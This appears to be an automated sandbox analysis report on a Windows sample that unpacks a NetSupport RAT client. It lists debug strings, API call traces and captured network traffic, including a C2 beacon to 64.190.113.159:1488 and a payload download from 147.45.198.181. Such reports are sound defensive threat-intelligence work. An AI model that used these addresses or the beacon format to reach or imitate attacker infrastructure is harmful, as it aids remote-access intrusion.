                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577865426.000000006CB81000.00000020.00000001.01000000.0000001A.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2046822337.00007FFE10307000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047481292.00007FFE11EDD000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047013819.00007FFE11518000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2041453144.00007FFDFABA0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\AudioCapture\Release\AudioCapture.pdb source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047703009.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA192F0 FindFirstFileExW,FindClose,0_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA192F0 FindFirstFileExW,FindClose,1_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7A0340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFDFB7A0340
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6CBDCA9B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6CBDC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA7C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBA7C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6CBDDF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6CBDDA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6CBDD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then add byte ptr [edi], dh6_2_6CB98468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then push esi6_2_6CB8F640

                                Networking

                                Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49733 -> 64.190.113.159:1488
                                Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknown Network traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknown DNS query: name: api.telegram.org
                                Source: global traffic TCP traffic: 192.168.2.4:49733 -> 64.190.113.159:1488
                                Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: Joe Sandbox View IP Address: 149.154.167.220
                                Source: Joe Sandbox View IP Address: 104.26.1.231
                                Source: Joe Sandbox View ASN Name: TRAVELCLICKCORP1US
                                Source: unknown DNS query: name: api.ipify.org
                                Source: unknown TCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 22 Feb 2025 01:46:43 GMT Content-Type: application/zip Content-Length: 2186234 Last-Modified: Thu, 13 Feb 2025 23:11:45 GMT Connection: keep-alive ETag: "67ae7c31-215bfa" Accept-Ranges: bytes
                                Source: global traffic HTTP traffic detected: GET /build2.zip HTTP/1.1 Host: 147.45.198.181 User-Agent: python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
                                Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global traffic DNS traffic detected: DNS query: api.ipify.org
                                Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                                Source: unknown HTTP traffic detected: POST http://64.190.113.159/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 64.190.113.159 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 22 Feb 2025 01:46:49 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 915b4df82e8718c4-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrQNRjKSFqsXh8uloYi4w2Pe1MPGHuWD0k7JjWgKz92gJW%2ByRW%2BjgUqdjlh6qsUUNuuO9ROtxOWVK%2BwRtL8VySB1S%2FbjCberCiotIx0NJZAvfQ1eJmyktQEeyKT5nc1UyW7LKtluPj1QY8IC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 22 Feb 2025 01:46:50 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 915b4dfe49622363-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIWA08BEoZcQh2C%2BH6UkXDWo%2FMmD7v0e9zMQD7Ezhw%2B3nIVxcSgSCT%2FqxgIuLKI%2FTMqbVZ%2F3tKTO2V%2BxeAr0Ye%2BE46IWOEecf8GYrbfcjqyR4NoNJTaVxEjAtiastOj4Jb9VefigTYSA%2FsFp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1872&rtt_var=936&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
